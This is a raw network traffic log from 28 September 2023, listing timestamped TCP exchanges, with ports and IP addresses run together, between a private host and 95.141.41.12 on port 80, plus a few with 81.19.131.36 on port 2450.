                                                                                              Sep 28, 2023 06:02:38.963778973 CEST804992995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.965141058 CEST804992995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.965250015 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.076551914 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.077054024 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.270360947 CEST804992995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:39.270597935 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.272275925 CEST804993095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:39.272454977 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.285840034 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:39.481301069 CEST804993095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.097860098 CEST804993095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.098073006 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.431371927 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.431791067 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.627208948 CEST804993095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.627509117 CEST4993080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.633254051 CEST804993295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.633347034 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.633599043 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.834939003 CEST804993295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.835901022 CEST804993295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:40.836112976 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.950176954 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:40.950608015 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.151804924 CEST804993295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.151947975 CEST4993280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.152139902 CEST804993495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.152240992 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.152487040 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.353915930 CEST804993495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.356829882 CEST804993495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.356925011 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.465944052 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.466459036 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.663158894 CEST804993695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.663275003 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.663495064 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.667597055 CEST804993495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.667685032 CEST4993480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.860285044 CEST804993695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.864646912 CEST804993695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:41.864809990 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.965831041 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:41.966367006 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.162719011 CEST804993995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.162929058 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.162961960 CEST804993695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.163079977 CEST4993680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.163213968 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.359505892 CEST804993995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.365104914 CEST804993995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.365210056 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.481266022 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.481741905 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.678026915 CEST804993995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.678283930 CEST4993980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.686418056 CEST804994195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.686738014 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.687364101 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:42.891612053 CEST804994195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.896296024 CEST804994195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:42.896545887 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.012789011 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.013103962 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.201112032 CEST804994295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.201311111 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.201455116 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.217979908 CEST804994195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.218198061 CEST4994180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.388993025 CEST804994295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.394805908 CEST804994295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.395026922 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.505815029 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.506228924 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.694189072 CEST804994295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.694425106 CEST4994280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.702826977 CEST804994495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.702950001 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.703142881 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:43.899590015 CEST804994495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.904525995 CEST804994495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:43.904764891 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.012598038 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.014956951 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.202073097 CEST804994595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.202284098 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.202425957 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.209505081 CEST804994495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.209707022 CEST4994480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.389998913 CEST804994595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.396702051 CEST804994595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.396836996 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.512548923 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.512938976 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.700340033 CEST804994595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.700489044 CEST4994580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.704040051 CEST804994695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.704185009 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.704581022 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:44.895705938 CEST804994695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.905478954 CEST804994695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:44.905576944 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.019273996 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.022728920 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.212229967 CEST804994695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.212368011 CEST4994680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.215109110 CEST804994895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.215209007 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.218278885 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.409518003 CEST804994895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.414534092 CEST804994895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.414707899 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.528398037 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.528808117 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.719118118 CEST804994895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.719216108 CEST4994880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.725337982 CEST804994995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.725447893 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.730411053 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:45.929351091 CEST804994995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.933583021 CEST804994995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:45.933701038 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.044416904 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.044739962 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.233232021 CEST804995395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.233650923 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.233819962 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.241260052 CEST804994995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.241380930 CEST4994980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.345575094 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.348097086 CEST498012450192.168.2.381.19.131.36
                                                                                              Sep 28, 2023 06:02:46.422801018 CEST804995395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.427618980 CEST804995395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.427679062 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.543889046 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.544384003 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.559501886 CEST24504980181.19.131.36192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.731295109 CEST804995595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.731590033 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.731786013 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.732306957 CEST804995395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.732409000 CEST4995380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:46.918818951 CEST804995595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.924827099 CEST804995595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:46.925064087 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.029174089 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.029565096 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.216581106 CEST804995595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.216712952 CEST4995580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.223130941 CEST804995895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.223206997 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.223444939 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.416979074 CEST804995895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.422827005 CEST804995895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.422895908 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.528302908 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.528985023 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.721673965 CEST804995895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.721746922 CEST4995880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.728477001 CEST804996095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.728611946 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.728843927 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:47.949870110 CEST804996095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.952110052 CEST804996095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:47.952292919 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.068665028 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.069070101 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.266608953 CEST804996395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.266768932 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.267009974 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.269248962 CEST804996095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.269332886 CEST4996080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.464370966 CEST804996395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.470272064 CEST804996395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.470361948 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.575560093 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.576070070 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.772927046 CEST804996395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.773343086 CEST4996380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.776803970 CEST804996695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.776973009 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.777271986 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:48.978246927 CEST804996695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.982611895 CEST804996695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:48.983119011 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.090794086 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.091178894 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.284605980 CEST804996995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.285072088 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.285670042 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.291816950 CEST804996695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.292263985 CEST4996680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.481117964 CEST804996995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.484982967 CEST804996995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.485446930 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.590862036 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.591145992 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.784316063 CEST804996995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.784616947 CEST804997195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.784627914 CEST4996980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.784713030 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.787607908 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:49.980948925 CEST804997195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.984366894 CEST804997195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:49.984445095 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.098475933 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.098849058 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.292366028 CEST804997195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.292505980 CEST4997180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.293138027 CEST804997495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.293220043 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.293565989 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.487746000 CEST804997495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.492278099 CEST804997495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.492501974 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.606694937 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.607002974 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.801158905 CEST804997495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.801367044 CEST4997480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.801902056 CEST804997795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:50.801980972 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.802189112 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:50.997273922 CEST804997795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.003606081 CEST804997795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.003683090 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.106524944 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.106950998 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.302396059 CEST804997795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.302520990 CEST4997780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.304573059 CEST804998095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.304655075 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.304980993 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.503077984 CEST804998095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.508750916 CEST804998095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.508961916 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.622155905 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.622724056 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.810172081 CEST804998395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.810374022 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.810689926 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.820453882 CEST804998095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:51.820647955 CEST4998080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:51.997283936 CEST804998395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.001777887 CEST804998395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.001837015 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.106184006 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.106873989 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.296957016 CEST804998395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.297339916 CEST4998380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.297547102 CEST804998595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.297765970 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.297900915 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.488058090 CEST804998595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.492737055 CEST804998595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.492824078 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.608325005 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.608727932 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.799094915 CEST804998595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.799246073 CEST4998580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.801996946 CEST804998995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:52.802190065 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.802347898 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:52.999017954 CEST804998995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.004324913 CEST804998995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.004451990 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.106719017 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.106966972 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.300220966 CEST804998995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.300383091 CEST4998980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.304887056 CEST804999095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.305128098 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.305241108 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.503413916 CEST804999095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.509951115 CEST804999095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.510420084 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.622190952 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.622801065 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.822818995 CEST804999295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.822932005 CEST804999095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:53.823054075 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.823116064 CEST4999080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:53.823291063 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.021192074 CEST804999295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.025660992 CEST804999295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.025728941 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.137506008 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.138026953 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.334623098 CEST804999595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.334847927 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.334960938 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.337100029 CEST804999295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.337160110 CEST4999280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.531410933 CEST804999595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.536508083 CEST804999595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.536699057 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.638058901 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.638346910 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.832031965 CEST804999695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.832128048 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.833679914 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:54.834479094 CEST804999595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:54.834651947 CEST4999580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.027379990 CEST804999695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.032604933 CEST804999695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.032829046 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.138956070 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.139240980 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.324143887 CEST804999895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.324373960 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.324641943 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.332849026 CEST804999695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.333058119 CEST4999680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.509735107 CEST804999895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.514705896 CEST804999895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.514842033 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.623084068 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.623892069 CEST5000280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.807929039 CEST804999895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.808197975 CEST4999880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.818631887 CEST805000295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:55.818775892 CEST5000280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:55.818986893 CEST5000280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:56.014209032 CEST805000295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.018261909 CEST805000295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:56.018342972 CEST5000280192.168.2.395.141.41.12
